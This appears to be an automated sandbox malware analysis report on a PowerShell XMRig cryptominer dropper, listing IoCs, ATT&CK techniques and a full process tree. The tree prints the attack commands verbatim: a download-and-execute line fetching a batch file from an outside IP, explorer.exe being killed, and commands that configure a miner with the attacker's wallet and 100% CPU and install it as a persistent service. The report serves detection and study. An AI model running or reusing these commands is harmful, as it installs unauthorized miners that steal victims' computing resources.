xmrig | d38a97f0d4cf8706ecf5da15ff500bddd6a96228c4c2cd65be19afdaee9523db

Analysis

max time kernel
1199s
max time network
1193s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
04/07/2024, 23:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

script.ps1
Size

130B
MD5

a18ee846019bfeb04eb7f15c2b9fd86a
SHA1

71b3b13a9351241124d605681f7d81e56e7ef321
SHA256

d38a97f0d4cf8706ecf5da15ff500bddd6a96228c4c2cd65be19afdaee9523db
SHA512

4b4bb2e4bb5d968c8079b1cfcefddcd0496b87140fec8d7abfc062633ee3bcd6f76efd9aa794a5b3cdfb2ad33404d7e5ffb9b396c75a3eccf3565bcf5b537f92

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac0a-178.dat	family_xmrig
behavioral1/files/0x000700000001ac0a-178.dat	xmrig
behavioral1/memory/4160-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-488-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-489-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-490-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-491-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-492-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-493-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-495-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-496-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-497-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-498-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-499-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-500-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-501-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-502-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-503-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-504-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-505-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-506-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-507-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-508-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-509-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-510-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-511-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-512-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-513-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-514-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-515-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-516-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-517-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-518-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-519-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-520-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-521-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-522-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-523-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4260-524-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	1012	powershell.exe
3	2692	powershell.exe
5	4908	powershell.exe
7	3444	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4160	xmrig.exe
4676	nssm.exe
220	nssm.exe
4812	nssm.exe
1012	nssm.exe
3996	nssm.exe
3968	nssm.exe
4628	nssm.exe
4260	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2720	sc.exe
5100	sc.exe
3828	sc.exe
5088	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2992	powershell.exe
2408	powershell.exe
2700	powershell.exe
2692	powershell.exe
4908	powershell.exe
3444	powershell.exe
1012	powershell.exe
3896	powershell.exe
1740	powershell.exe
868	powershell.exe
2548	powershell.exe
4824	powershell.exe
5088	powershell.exe
1432	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2984	timeout.exe
2660	Process not Found
744	Process not Found
1016	timeout.exe
312	timeout.exe
2972	timeout.exe
3884	timeout.exe
4280	Process not Found
656	Process not Found
3720	Process not Found
2220	timeout.exe
2716	timeout.exe
4852	timeout.exe
4932	Process not Found
2128	Process not Found
700	Process not Found
1012	timeout.exe
3380	timeout.exe
1132	Process not Found
3288	Process not Found
3708	timeout.exe
1852	timeout.exe
2244	timeout.exe
1532	Process not Found
2844	Process not Found
2832	Process not Found
2868	timeout.exe
3572	timeout.exe
4248	timeout.exe
4804	timeout.exe
5100	Process not Found
4220	Process not Found
5076	timeout.exe
4068	timeout.exe
3168	timeout.exe
1948	timeout.exe
4908	timeout.exe
900	Process not Found
4708	Process not Found
2140	Process not Found
4540	Process not Found
2120	Process not Found
4592	timeout.exe
2716	timeout.exe
3476	timeout.exe
4928	timeout.exe
3652	Process not Found
524	timeout.exe
752	Process not Found
3976	Process not Found
4928	timeout.exe
4844	timeout.exe
4908	timeout.exe
4876	Process not Found
1988	timeout.exe
592	timeout.exe
200	timeout.exe
680	Process not Found
2060	Process not Found
1656	timeout.exe
2188	timeout.exe
3528	timeout.exe
4620	Process not Found
624	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2128	taskkill.exe
4572	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe
1740	powershell.exe
1740	powershell.exe
1740	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
868	powershell.exe
868	powershell.exe
868	powershell.exe
2992	powershell.exe
2992	powershell.exe
2992	powershell.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
2548	powershell.exe
2548	powershell.exe
2548	powershell.exe
3444	powershell.exe
3444	powershell.exe
3444	powershell.exe
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeLockMemoryPrivilege	4260	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeSecurityPrivilege	2764	WMIC.exe
Token: SeTakeOwnershipPrivilege	2764	WMIC.exe
Token: SeLoadDriverPrivilege	2764	WMIC.exe
Token: SeSystemProfilePrivilege	2764	WMIC.exe
Token: SeSystemtimePrivilege	2764	WMIC.exe
Token: SeProfSingleProcessPrivilege	2764	WMIC.exe
Token: SeIncBasePriorityPrivilege	2764	WMIC.exe
Token: SeCreatePagefilePrivilege	2764	WMIC.exe
Token: SeBackupPrivilege	2764	WMIC.exe
Token: SeRestorePrivilege	2764	WMIC.exe
Token: SeShutdownPrivilege	2764	WMIC.exe
Token: SeDebugPrivilege	2764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2764	WMIC.exe
Token: SeRemoteShutdownPrivilege	2764	WMIC.exe
Token: SeUndockPrivilege	2764	WMIC.exe
Token: SeManageVolumePrivilege	2764	WMIC.exe
Token: 33	2764	WMIC.exe
Token: 34	2764	WMIC.exe
Token: 35	2764	WMIC.exe
Token: 36	2764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeSecurityPrivilege	2764	WMIC.exe
Token: SeTakeOwnershipPrivilege	2764	WMIC.exe
Token: SeLoadDriverPrivilege	2764	WMIC.exe
Token: SeSystemProfilePrivilege	2764	WMIC.exe
Token: SeSystemtimePrivilege	2764	WMIC.exe
Token: SeProfSingleProcessPrivilege	2764	WMIC.exe
Token: SeIncBasePriorityPrivilege	2764	WMIC.exe
Token: SeCreatePagefilePrivilege	2764	WMIC.exe
Token: SeBackupPrivilege	2764	WMIC.exe
Token: SeRestorePrivilege	2764	WMIC.exe
Token: SeShutdownPrivilege	2764	WMIC.exe
Token: SeDebugPrivilege	2764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2764	WMIC.exe
Token: SeRemoteShutdownPrivilege	2764	WMIC.exe
Token: SeUndockPrivilege	2764	WMIC.exe
Token: SeManageVolumePrivilege	2764	WMIC.exe
Token: 33	2764	WMIC.exe
Token: 34	2764	WMIC.exe
Token: 35	2764	WMIC.exe
Token: 36	2764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3020	WMIC.exe
Token: SeSecurityPrivilege	3020	WMIC.exe
Token: SeTakeOwnershipPrivilege	3020	WMIC.exe
Token: SeLoadDriverPrivilege	3020	WMIC.exe
Token: SeSystemProfilePrivilege	3020	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4260	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1012 wrote to memory of 1172	1012	powershell.exe	74
PID 1012 wrote to memory of 1172	1012	powershell.exe	74
PID 1172 wrote to memory of 2128	1172	cmd.exe	76
PID 1172 wrote to memory of 2128	1172	cmd.exe	76
PID 1172 wrote to memory of 2692	1172	cmd.exe	78
PID 1172 wrote to memory of 2692	1172	cmd.exe	78
PID 2692 wrote to memory of 1008	2692	powershell.exe	79
PID 2692 wrote to memory of 1008	2692	powershell.exe	79
PID 1008 wrote to memory of 2868	1008	cmd.exe	80
PID 1008 wrote to memory of 2868	1008	cmd.exe	80
PID 2868 wrote to memory of 2464	2868	net.exe	81
PID 2868 wrote to memory of 2464	2868	net.exe	81
PID 1008 wrote to memory of 2116	1008	cmd.exe	82
PID 1008 wrote to memory of 2116	1008	cmd.exe	82
PID 1008 wrote to memory of 1096	1008	cmd.exe	83
PID 1008 wrote to memory of 1096	1008	cmd.exe	83
PID 1008 wrote to memory of 1696	1008	cmd.exe	84
PID 1008 wrote to memory of 1696	1008	cmd.exe	84
PID 1008 wrote to memory of 664	1008	cmd.exe	85
PID 1008 wrote to memory of 664	1008	cmd.exe	85
PID 1008 wrote to memory of 4672	1008	cmd.exe	86
PID 1008 wrote to memory of 4672	1008	cmd.exe	86
PID 1008 wrote to memory of 5100	1008	cmd.exe	87
PID 1008 wrote to memory of 5100	1008	cmd.exe	87
PID 1008 wrote to memory of 3828	1008	cmd.exe	88
PID 1008 wrote to memory of 3828	1008	cmd.exe	88
PID 1008 wrote to memory of 4572	1008	cmd.exe	89
PID 1008 wrote to memory of 4572	1008	cmd.exe	89
PID 1008 wrote to memory of 4908	1008	cmd.exe	90
PID 1008 wrote to memory of 4908	1008	cmd.exe	90
PID 1008 wrote to memory of 1432	1008	cmd.exe	91
PID 1008 wrote to memory of 1432	1008	cmd.exe	91
PID 1008 wrote to memory of 4824	1008	cmd.exe	92
PID 1008 wrote to memory of 4824	1008	cmd.exe	92
PID 1008 wrote to memory of 4160	1008	cmd.exe	93
PID 1008 wrote to memory of 4160	1008	cmd.exe	93
PID 1008 wrote to memory of 224	1008	cmd.exe	94
PID 1008 wrote to memory of 224	1008	cmd.exe	94
PID 224 wrote to memory of 5088	224	cmd.exe	95
PID 224 wrote to memory of 5088	224	cmd.exe	95
PID 5088 wrote to memory of 3508	5088	powershell.exe	96
PID 5088 wrote to memory of 3508	5088	powershell.exe	96
PID 1008 wrote to memory of 1740	1008	cmd.exe	97
PID 1008 wrote to memory of 1740	1008	cmd.exe	97
PID 1008 wrote to memory of 3896	1008	cmd.exe	98
PID 1008 wrote to memory of 3896	1008	cmd.exe	98
PID 1008 wrote to memory of 868	1008	cmd.exe	99
PID 1008 wrote to memory of 868	1008	cmd.exe	99
PID 1008 wrote to memory of 2992	1008	cmd.exe	100
PID 1008 wrote to memory of 2992	1008	cmd.exe	100
PID 1008 wrote to memory of 2408	1008	cmd.exe	101
PID 1008 wrote to memory of 2408	1008	cmd.exe	101
PID 1008 wrote to memory of 2548	1008	cmd.exe	102
PID 1008 wrote to memory of 2548	1008	cmd.exe	102
PID 1008 wrote to memory of 3444	1008	cmd.exe	103
PID 1008 wrote to memory of 3444	1008	cmd.exe	103
PID 1008 wrote to memory of 2700	1008	cmd.exe	104
PID 1008 wrote to memory of 2700	1008	cmd.exe	104
PID 1008 wrote to memory of 5088	1008	cmd.exe	105
PID 1008 wrote to memory of 5088	1008	cmd.exe	105
PID 1008 wrote to memory of 2720	1008	cmd.exe	106
PID 1008 wrote to memory of 2720	1008	cmd.exe	106
PID 1008 wrote to memory of 4676	1008	cmd.exe	107
PID 1008 wrote to memory of 4676	1008	cmd.exe	107

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6CB4.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1008
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:2464
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:2116
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:1096
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:1696
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:664
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:4672
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:5100
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:4160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5088
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:3508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ndtnzvhn\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2408
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:5088
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:2720
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4676
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:220
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:4812
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:1012
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:3996
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
